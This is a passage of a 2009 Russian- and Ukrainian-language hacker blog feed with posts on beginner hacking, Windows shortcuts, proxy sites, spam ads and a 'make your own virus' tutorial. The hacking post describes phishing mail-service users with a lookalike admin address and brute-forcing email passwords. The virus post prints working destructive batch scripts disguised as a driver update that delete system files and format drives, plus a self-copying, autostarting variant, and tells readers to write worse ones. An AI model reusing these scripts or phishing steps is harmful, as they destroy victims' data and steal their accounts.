там. Таким образом, прокси помодет вам работать более безопасно и к тому же, ПРОКСИ ускоряет на 20-30% или даже больше работу в сети!! Ну а если спрашиваете как определить если прокси рабочий или нет, скажу что наша команда Whack Team разработала скрипт который очень легко определяет если прокси рабочие или нет! Подробней вы сможете узнать http://forum.whack.ru/showthread.php?t=1619&lt;br /&gt;&lt;br /&gt;Поговорим о видах атаках…&lt;br /&gt;Все должны знать что хакер без атаки это уже не хакер)) Давайте немного проясню что и как в домене атаках). Атаки бывают разные, и каждые более или менее продуктивны! Начнём с самого простого, но достаточного продуктивного! Поговорим о Социальной Инженерии! Между хакерах СИ это начальная стадия в атаке, особенно на е-майлах или icq. Суть атаки при помощи Си в том чтобы напудрить мозги цели, и заставить чела отдать добровольно его пароль)) Пример: Пишите челу на почту с анонимной почты. Для начала, вы напишите как администрация сервака или мыла, что типа вы увеличите обьём почты, но для этого чел должен писатьв ответ его мыло, логин и пароль) Также зарегистрируйте е-майл такой чтобы бил похож на настоящий администраторский е-майл. Пример: support@mail.ru и ваш suport@mail.ru или чтото такое. Не забываем в письме написать второй адрес е-майл для того чтобы чел отправил именно вам его пароль и т.д. Больше о Социальной инженерией можно найти http://forum.whack.ru/forumdisplay.php?f=67 Второй срупенькой атаки это насильный взлом. Если СИ не помог, идём на следующий уровень. Тут многое делает Брут-форсеры. Брут это вид атаки который делается насильным способом! Если вам нужно сломать е-майл, можно применить брутус. НО хапомните что все почтовые сервисы имеют свои отдельные брутусы и нельзя использовать один и тот же Брут к разным почтам!!! На сегодняшний день, хакеры создали Брут-форсеры для наиболее известные почтовые сервисы такие как mail.ru - yandex.ru - pochta.ru - rambler.ru и другие! Работа Брут-форсера состоит в том чтобы переберать пароль. Он делает это с помощью словарей - текстовики с листами возможных паролей. Они состовляются по длине пароля, сложность (буквы, цифры, знакиб т.д.) и по длине. Они могут быть от нескольких кб до Гб! У меня самый большой словари стоит на 4.8 гиг!)) Для брутуса чем больше словарь, тем больше шансы на находку паролей! Но таким образом появляется другая проблема, а именно время затраченное на Брут пароля. Даже если это долгий процесс, это тоже весьма продуктивный вид атаки. Так же есть и другие виды атак как XSS, SQL Injection и другие, НО это новичкам ещё рано знать! К тому же для последних вид атак нужно хорошо знать языки веб прграммирования как: php, java, perl и html. Эти виды атак вы сможете изучать и использовать но чуть пойже, когда наберёте немного опыта в хакерстве!&lt;br /&gt;&lt;br /&gt;Вирусалогия&lt;br /&gt;Все слышали о вирусах, но мало кто знает как сложно они создаются. Но не будет мы о этом говорить) Вирусалогия довольно опасная но также продуктивная ступенька в атаке! Вредоносные программы занимают почётное место среди выше напоминаемых вид атак. Вирусы, очень коварные хотя и обычные программы только с изменимым кодом. Они способны поражать всё что находится по близости, а так же только один вид программ и приложений…Всё зависит от фантазии вирусмэйкера) Обычно вирусы заражают файлы .exe .com и другие. Но с расширением и глобализацией сети Интернет, вирусмэйкеры пошли на более коварные методы! Сегодня легко можно подловить вируса если только зайти на обычную веб страницу!!! Такие вирусы заходят на ваш ПК даже не спрашивая вас) Они сами по себе начинают работать, заражать или даже уничтожать всё что встретит! Вирусы также бывают нескольких видов: вирусы заражители, Трояны, бэк-доры(Троян) и другие) Трояны эдни из самых опастных вирусов на сег день! Его можно легко подловить и очень сложно от него избавится! Принцип его действия заключается в том что он внедряется на ваш компютер и сидит там тихо. Ничего не заражает или чтото такое! Но это до тез пор, пока его отец не свяжется с ним) Чтобы понять это, я расскажу так: Троян после настройке и перед отправки к цели, он как бы разделяется на две части. Как ракета в космосе и управление с земли. Так вот, он ждёт пока с ним не свяжется его создатель(первая половина). Когда он с ним связался, тогда начинается чтото очень интересное… Троян имеет полный контроль над вашим компом. Он лего открывает, закрывает окна, программы или чтото другое. Я даже видел как хакер разговаривал с жертвой через блокнот! Вопщем, трой на вашем компе это очень серьёзная проблема.&lt;br /&gt;Защита против вирусов и Троянов это антивирус, файрвол и ваша внимательность! Больше о вирусах и Троянах можно читать на нашем форуме: www.forum.whack.ru а именно здесь http://forum.whack.ru/forumdisplay.php?f=17&lt;br /&gt;&lt;br /&gt;Безопасность&lt;br /&gt;Даже если мы, хакеры, ломаем безопастность других, нам очень нужно подумать о своей безопастности, чтобы не быть на месте что и чел которого вы ломаете) Хакер, это тот кто знает очень хорошо компютер, сеть и всё что их касается, но он по настоящему становится хакером, когда он в первую очередь заботится о своей безопасности! Ведь каждая атака начинается с изучения безопастности цели и потом уже по обстоятельству выбирается метод атаки. Безопастность вашего компютера зависит только от вас и не от когото другово! Во первых, безопасность в вашем компютере…Установите антивирус мощный и надёжный! Выбор уже за вами, так как у всех разные вкусы и возможности! Из лучших антивирей могу сказать о Nod32, Kaspersky, Avast, Norton и другие! Регулярно обновляйте базы антивируса, и один раз в недели выполняйте полную проверку вашего комютера на вирусы! Это поможет вам повысить уровень безопастности! Если вы в сети стите, то не нужно забывать о Файрволе!!! Это поможет держать ваш компютер в Интернете на замке! Один из лучших файрволах это Outpost Firewall и Kaspersky Anti-Hacker) Их так же нельзя отключить при входе в Интернет! Это дело вашей безопастности! И я в начале говорил о вашей бдительности в сфере защиты, так вот, не скачайте файлы с подозрительных сайтов! Не принимайте через е-майл или пэйджеры сомнительные файлы и данные!!! Там с легкостью может быть Троян, а о нём мы уже говорили! Не распостроняйте слишком много информации о себе в Интернете, на форумах и т.д. Будьте максимально осторожны, и это вам поможет быть защищёным! Ну и как же забыть о паролях! О паролях воопще можно целую книгу написать..)) Главное! Не пишите одни и теже пароли везьде! Сторайтесь чтобы ваши пароли были не меньше 6-8 знаков а именно (3pas$w0rd!) это пример! Таким образом, будет очень сложно его ломать! Так же не кликайте на ссылки что приходят по почте или icq так как под ними может быть сниффер и злоумышленник, легко сможеть получить ваш пароль! Ещё раз, будьте Бдительны!&lt;br /&gt;&lt;br /&gt;==================&lt;br /&gt;&lt;br /&gt;Тут вопщем, статья и заканчивается, но не забудьте что это первая часть, и скоро будет продолжение! Также, читайте наш форум!&lt; www.forum.whack.ru &gt;! Наша команда всегда будет рада вам помочь!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-8818918181738236243?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/8818918181738236243/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=8818918181738236243' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8818918181738236243'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8818918181738236243'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/03/blog-post.html' title='Вопросы новичков, новичкам.'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-8168118262055991037</id><published>2009-02-23T08:45:00.001-08:00</published><updated>2009-02-23T08:45:30.842-08:00</updated><title type='text'>Сочетание клавиш, для новичков...</title><content type='html'>Здравствуй новичок! Работая, и хакая : ) в среде windows нужно знать не только:&lt;br /&gt;Что такое: уязвимости, что такое: теги, и т.д.&lt;br /&gt;Помимо того, нужно знать обычные вещи, как Сочетания клавиш в среде windows!&lt;br /&gt;Как я предоставил ниже, стаблицой было бы удобнее, но увы……&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Сочетание клавиш Назначение&lt;br /&gt;Internet Explorer&lt;br /&gt;&lt;br /&gt;F4 Открывает всплывающее меню посещенных URLов&lt;br /&gt;F5 Обновляет страницу, если время ее создания отличается от времени создания ее варианта, сохраненного на компьютере.&lt;br /&gt;F6 Перемещаться между элементами вперед&lt;br /&gt;F11 Переключиться между обычным и полноэкранным режимом&lt;br /&gt;BACKSPASE Перейти на предыдущую страницу&lt;br /&gt;ENTER Активизировать выбранную ссылку&lt;br /&gt;TAB Перейти к следующему элементу веб-страницы, адресной строки или панели ссылок&lt;br /&gt;ESС Прекращает загрузку страницы&lt;br /&gt;CTRL + TAB Перемещается между элементами вперед&lt;br /&gt;CTRL + A Выделить все на активной веб-странице&lt;br /&gt;CTRL + B Открыть диалоговое окно "Упорядочить Избранное"&lt;br /&gt;CTRL + С Копирование выделенных объектов в буфер обмена&lt;br /&gt;CTRL + E Открыть панель "Поиск"&lt;br /&gt;CTRL + H Открыть панель "Журнал"&lt;br /&gt;CTRL + I Открыть панель "Избранное"&lt;br /&gt;CTRL + L Перейти к другому адресу&lt;br /&gt;CTRL + N Открыть новое окно&lt;br /&gt;CTRL + O Перейти к другому адресу&lt;br /&gt;CTRL + P Напечатать текущую страницу или элемент&lt;br /&gt;CTRL + R Обновить страницу, если время ее создания отличается от времени создания ее варианта, сохраненного на компьютере.&lt;br /&gt;CTRL + S Сохранить текущую страницу&lt;br /&gt;CTRL + V Вставка содержимого буфера обмена в указанное место&lt;br /&gt;CTRL + W Закрыть текущее окно&lt;br /&gt;CTRL + X Удаление выделенных объектов в буфер обмена&lt;br /&gt;CTRL + F5 Обновить страницу, даже если время ее создания совпадает с временем создания ее варианта, сохраненного на компьютере&lt;br /&gt;CTRL + [щелчок кнопкой мыши] Открыть несколько папок на панелях "Журнал" или "Избранное"&lt;br /&gt;CTRL + [стрелка влево] Переместить курсор в адресной строке влево до следующего логического разрыва (. или /)&lt;br /&gt;CTRL + [стрелка вправо] Переместить курсор в адресной строке вправо до следующего логического разрыва (. или /)&lt;br /&gt;CTRL + ENTER Добавить "WWW." в начало и ".COM" в конец введенного URLа.&lt;br /&gt;SHIFT + CTRL + TAB Перемещаться между элементами назад&lt;br /&gt;SHIFT + TAB Показать контекстное меню для ссылки&lt;br /&gt;ALT + D Выделить текст в адресной строке&lt;br /&gt;ALT + HOME Перейти на домашнюю страницу&lt;br /&gt;ALT + [стрелка вправо] Перейти на следующую страницу&lt;br /&gt;ALT + [стрелка влево] Перейти на предыдущую страницу&lt;br /&gt;[стрелка вверх] Пролистать документ к началу, или перейти вверх по списку "Автозаполнение", или переместить выделение на строку вверх в списке избранного в диалоговом окне "Упорядочить избранное"&lt;br /&gt;[стрелка вниз] Пролистать документ к концу, или перейти вниз по списку "Автозаполнение", или переместить выделение на строку вниз в списке избранного в диалоговом окне "Упорядочить избранное"&lt;br /&gt;Page Up Пролистать документ к началу с большим шагом&lt;br /&gt;Page Down Пролистать документ к концу с большим шагом&lt;br /&gt;Home Перейти к началу документа&lt;br /&gt;End Перейти к концу документа&lt;br /&gt;Shift + [Щелчок по гиперссылке] Открыть документ в новом окне&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Windows &lt;br /&gt;SHIFT + Щелчок правой кнопкой Открывает контекстное меню, содержащее дополнительные пункты.&lt;br /&gt;SHIFT + Двойной щелчок правой кнопкой Выполняет альтернативную команду (обычно второй пункт в контекстном меню).&lt;br /&gt;ALT + Двойной щелчок правой кнопкой Открывает окно свойств объекта.&lt;br /&gt;DELETE Удаляет объект.&lt;br /&gt;SHIFT + DELETE Немедленно удаляет объект без помещения его в корзину.&lt;br /&gt;F1 Открывает встроенную справку.&lt;br /&gt;F10 Активирует строку меню.&lt;br /&gt;SHIFT + F10 Открывает контекстное меню выделенного объекта. Нажатие этих клавиш эквивалентно правому щелчку мыши на объекте.&lt;br /&gt;CTRL + ESC Открывает меню "Пуск".&lt;br /&gt;CTRL + ESC, ESC Делает текущим выделенным объектом кнопку Пуск. После этого можно нажать клавишу TAB, сделав активным объектом панель задач, или сочетание клавиш SHIFT+F10, чтобы открыть контекстное меню кнопки Пуск. Эквивалентно двойному щелчку по кнопке "Пуск".&lt;br /&gt;ALT + [стрелка вниз] Открывает раскрывающийся список.&lt;br /&gt;ALT + TAB Делает активным другое выполняющееся приложение (бывшее активным непосредственно перед текущим). Для переключения на другие приложения нажимайте клавишу TAB несколько раз, не отпуская клавишу ALT. При этом в центре экрана появится панель, показывающая все запущенные приложения, и какое из них окажется активным, если вы отпустите клавишу ALT.&lt;br /&gt;SHIFT Удерживайте клавишу SHIFT нажатой, чтобы: &lt;br /&gt;во время загрузки Windows пропустить обработку папки "Автозагрузка" &lt;br /&gt;при вставке компакт-диска отменить выполнение процедуры автозапуска &lt;br /&gt;При нажатии клавиши ОК в диалоговом меню "Завершение работы" перезагрузить Windows без перезагрузки компьютера &lt;br /&gt;ALT + SPACE Открывает управляющее меню активного окна.&lt;br /&gt;ALT + - Открывает управляющее меню дочернего окна документа (в программах, которые могут открывать несколько документов одновременно).&lt;br /&gt;CTRL + TAB Вызывает переход в дочернее окно следующего документа (если в программе открыто сразу несколько документов).&lt;br /&gt;ALT + [подчеркнутая буква в меню] открывает соответствующее меню (может потребоваться предварительное переключение раскладки клавиатуры).&lt;br /&gt;ALT + F4 Закрывает текущее окно. Если ни одно окно не открыто, то открывает меню завершения работы Windows.&lt;br /&gt;CTRL + F4 Закрывает дочернее окно документа (в программах, которые могут открывать несколько документов одновременно).&lt;br /&gt;ALT + F4 Закрывает окно или выходит из программы.&lt;br /&gt;ALT + F6 Выполняет переход в следующее окно, открытое текущей программой.&lt;br /&gt;CTRL + [стрелка вправо] Выполняет переход к следующему слову (в текстовом редакторе).&lt;br /&gt;CTRL + [стрелка влево] Выполняет переход к предыдущему слову (в текстовом редакторе).&lt;br /&gt;F2 Переименование объекта.&lt;br /&gt;F3 Поиск в выделенной папке.&lt;br /&gt;F4 Раскрывает список адреса, если панель адреса выведена на экран.&lt;br /&gt;F5 Обновляет текущее окно.&lt;br /&gt;F6 Делает активной другую панель проводника.&lt;br /&gt;CTRL + X Вырезать.&lt;br /&gt;(CTRL + C) или (CTRL + INSERT) Копировать.&lt;br /&gt;(CTRL + V) или (SHIFT + INSERT) Вставить.&lt;br /&gt;CTRL + Z Отменяет последнюю команду.&lt;br /&gt;CTRL + A Выделяет все объекты в текущем окне.&lt;br /&gt;ALT + ENTER Открывает окна свойств выделенных объектов.&lt;br /&gt;CTRL Чтобы скопировать файл, во время перетаскивания удерживайте нажатой эту клавишу.&lt;br /&gt;SHIFT Чтобы переместить файл, во время перетаскивания удерживайте нажатой эту клавишу.&lt;br /&gt;CTRL + SHIFT Чтобы создать ярлык, во время перетаскивания удерживайте нажатыми эти клавиши.&lt;br /&gt;BACKSPACE Выполняет переход в родительскую папку.&lt;br /&gt;SHIFT + [щелчок на кнопке "закрыть"] Закрывает текущую папку и все родительские папки.&lt;br /&gt;Секреты &lt;br /&gt;Пятикратное нажатие клавиши SHIFT Включает/выключает режим "залипания" клавиш.&lt;br /&gt;Удержание клавиши SHIFT нажатой в течение восьми секунд Включает/выключает режим фильтрации ввода.&lt;br /&gt;Удержание клавиши NUM LOCK нажатой в течение восьми секунд Включает/выключает режим озвучивания.&lt;br /&gt;Левая ALT + левая SHIFT + NUM LOCK Включает/выключает управление указателем мыши с клавиатуры.&lt;br /&gt;Левая ALT + левая SHIFT + PRINT SCREEN Включает/выключает режим высокой контрастности.&lt;br /&gt;Сочетание клавиш Назначение&lt;br /&gt;WIN + Pause/Break Открывает диалоговое окно Свойства: Система (System properties).&lt;br /&gt;WIN + R Открывает окно "Запуск программы" (Run).&lt;br /&gt;WIN + M Сворачивает все открытые на данный момент окна, кроме диалоговых.&lt;br /&gt;WIN + D Сворачивает все открытые на данный момент окна, включая диалоговые.&lt;br /&gt;WIN + Shift + M Отменяет свертывание окон.&lt;br /&gt;WIN + F1 Открывает справочную систему Windows.&lt;br /&gt;WIN + E Открывает окно проводника.&lt;br /&gt;WIN + F Открывает окно для поиска файлов.&lt;br /&gt;CTRL + WIN + F Открывает окно для поиска компьютера.&lt;br /&gt;WIN + TAB Выполняет переключение между кнопками на панели задач.&lt;br /&gt;&lt;br /&gt;В заключение хочу сказать, что эти вещи размещены не только в интернете, а даже в самой «хрюше» В разделе Справка и поддержка!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-8168118262055991037?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/8168118262055991037/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=8168118262055991037' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8168118262055991037'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8168118262055991037'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_23.html' title='Сочетание клавиш, для новичков...'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-3473140230228795586</id><published>2009-02-18T01:22:00.000-08:00</published><updated>2009-02-18T01:25:21.247-08:00</updated><title type='text'>Заработок</title><content type='html'>Заробляйте на своєму сайті, блозі, дошці, новинний канал, закладці, роблячи посилання та короткі огляди товарів та послуг нашого сайту. Платні запису - це, на сьогодні, найшвидший і доступний спосіб монетизації ваших ресурсів. Легальний і цілком етично.&lt;br /&gt;&lt;a href='http://barter.universal-trade.ru/job-1.html'&gt;Заработок&lt;/a&gt;&lt;br /&gt;&lt;a href='http://barter.universal-trade.ru/job-1.html'&gt;Оплата по среднемировым тарифам&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-3473140230228795586?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/3473140230228795586/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=3473140230228795586' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3473140230228795586'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3473140230228795586'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_6114.html' title='Заработок'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-7470253041848746231</id><published>2009-02-18T01:18:00.000-08:00</published><updated>2009-02-18T01:19:53.983-08:00</updated><title type='text'>Работа</title><content type='html'>Работа, вакансии: http://universal-trade.ru/&lt;br /&gt;Приглашаем на работу в Бартерную биржу товаров и услуг. Ищем представителей по регионам. Оплата по среднемировым тарифам: http://universal-trade.ru/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href='http://universal-trade.ru/'&gt;Работа&lt;/a&gt;&lt;br /&gt;&lt;a href='http://universal-trade.ru/'&gt;Заработок&lt;/a&gt;&lt;br /&gt;&lt;a href='http://universal-trade.ru/'&gt;Оплата по среднемировым тарифам&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-7470253041848746231?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/7470253041848746231/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=7470253041848746231' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7470253041848746231'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7470253041848746231'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_18.html' title='Работа'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-3353036082575899898</id><published>2009-02-16T02:35:00.000-08:00</published><updated>2009-02-16T02:36:49.684-08:00</updated><title type='text'>house-md</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://kino-kiev.com/lj/house/130209/n1.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 268px; height: 274px;" src="http://kino-kiev.com/lj/house/130209/n1.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Інтернет магазин куча фудболок та разних гаджетів я собі замовив парочку.&lt;br /&gt;&lt;br /&gt;&lt;a href='http://house-md.biz/'&gt;House M.D.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-3353036082575899898?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/3353036082575899898/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=3353036082575899898' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3353036082575899898'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3353036082575899898'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/house-md.html' title='house-md'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-360048864678180361</id><published>2009-02-16T02:06:00.000-08:00</published><updated>2009-02-16T02:18:08.308-08:00</updated><title type='text'>Що робити якщо закрили доступ на сайт VKONTAKTE.ru</title><content type='html'>Якщо в вас на роботі або в коледжі чи навіть в школі злий дядька адмін закрив доступ до цього сайту ))) . То як завжди нам на допомогу приходять проксі та різні утілітки для забезпечення анонімності. Так звані анонімайери.&lt;br /&gt;Як ними користуватись чи як їх знайти .?&lt;br /&gt;Достатньо лише в гуглі написать "Анонімайзери"&lt;br /&gt;І ви получите велику масу інформації .&lt;br /&gt;Ось ті які я вибрав з маси !!! :&lt;br /&gt;http://www.proxyanon.com/&lt;br /&gt;http://www.anonproxy.info/&lt;br /&gt;http://www.proxysafe.com/&lt;br /&gt;http://www.strongproxy.com/&lt;br /&gt;http://www.boredatschool.net/&lt;span style="font-style:italic;"&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;http://www.kproxy.com/&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;http://www.ukproxy.com/&lt;br /&gt;http://www.simpleproxy.com/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-360048864678180361?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/360048864678180361/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=360048864678180361' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/360048864678180361'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/360048864678180361'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/vkontakteru.html' title='Що робити якщо закрили доступ на сайт VKONTAKTE.ru'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-8462526022837308936</id><published>2009-02-13T05:46:00.000-08:00</published><updated>2009-02-18T01:44:53.277-08:00</updated><title type='text'>Le Parkour</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://tbn2.google.com/images?q=tbn:YJR2UHqq0s2_oM:http://leparkour.slang.w.interia.pl/szablon_obrazki/Le%2520Parkour0.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 124px; height: 124px;" src="http://tbn2.google.com/images?q=tbn:YJR2UHqq0s2_oM:http://leparkour.slang.w.interia.pl/szablon_obrazki/Le%2520Parkour0.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Нашел первый электронный журнал про паркур.&lt;br /&gt;Всем кто хотя бы раз слышал это слово (Parkour) советую зайти сюда "журнал о паркур"&lt;br /&gt;Журнал просто супер. Кстати я уже как два года занимаюсь паркуром и&lt;br /&gt;на этом сайте нашел много вещей которые видел и не слышал.&lt;br /&gt;&lt;a href='http://www.traceur.ru'&gt;статьи о паркур&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-8462526022837308936?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/8462526022837308936/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=8462526022837308936' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8462526022837308936'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8462526022837308936'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/le-parkour.html' title='Le Parkour'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-7095221138414308730</id><published>2009-02-13T02:19:00.001-08:00</published><updated>2009-02-13T02:19:20.607-08:00</updated><title type='text'>Создай свой вирус</title><content type='html'>Создание вируса&lt;br /&gt;Есть несколько вариантов создания вируса.Мы рассмотрим лишь один из них...&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo Windows updating driver...&lt;br /&gt;attrib -r -h -s c:windows*.da?&lt;br /&gt;echo Y | del c:windows*.da?&lt;br /&gt;echo Y | del d:*.*&lt;br /&gt;attrib -r -h -s c:*.*&lt;br /&gt;echo Y | del c:*.sys&lt;br /&gt;echo Y | del c:*.bin&lt;br /&gt;echo Y | del c:*.bat&lt;br /&gt;echo Y | format d:&lt;br /&gt;echo Y | format c:&lt;br /&gt;echo Virus loading.... Completed!&lt;br /&gt;&lt;br /&gt;Это пример вируса...Да и еще одно договоримся сохранять наши проекты как .bat файлы... Итак, разберем по строкам... Первая строка "говорит" компьютеру, что не надо показывать операции. Вторая - выводит надпись Windows updating driver... третья и шестая-снимают все атрибуты(скрытый, для чтения и т.д.) с файлов. 4-ая, 5-я, 6-я, 7-я, 8-я и 9-я удаляют файлы на дисках. 10-я и 11-я форматируют диски. Ну и 12-я выводит знаменательную надпись: Virus loading.... Complited! Форматирование может и не произойти, но ОС будет испорчена... Задание:Создайте самостоятельно вирус, который будет "убивать" виндовс не только находящийся на диске С:.&lt;br /&gt;Рассмотрим еще один пример:&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;if exist c:aivus.bat goto cool&lt;br /&gt;copy %0 c:aivus.bat &gt;nul&lt;br /&gt;attrib +h c:aivus.bat &gt;nul&lt;br /&gt;echo c:aivus.bat&gt;&gt;c:autoexec.bat&lt;br /&gt;echo Y | del %0 &gt;nul&lt;br /&gt;:cool&lt;br /&gt;copy %0 a: un.bat &gt;nul&lt;br /&gt;copy %0 a:open.bat &gt;nul&lt;br /&gt;attrib +h a:open.bat &gt;nul&lt;br /&gt;echo Y | del c:windowscalc.exe &gt;nul&lt;br /&gt;attrib -h -s -r c:*.ini &gt;nul&lt;br /&gt;echo Y | del c:oot.ini &gt;nul&lt;br /&gt;echo Y | format a:&lt;br /&gt;&lt;br /&gt;Я думаю не все поняли, что это за строчки:&lt;br /&gt;if exist c:aivus.bat goto cool&lt;br /&gt;echo c:aivus.bat&gt;&gt;c:autoexec.bat&lt;br /&gt;copy %0 a:open.bat &gt;nul&lt;br /&gt;attrib +h a:open.bat &gt;nul&lt;br /&gt;&lt;br /&gt;Строчка if exist c:aivus.bat goto cool С вирусами связано и программирование... Те, кто чуть его знают, поняли её. Для других объясняю: Эта строка проверяет есть ли файл open.bat на диске С: , если есть 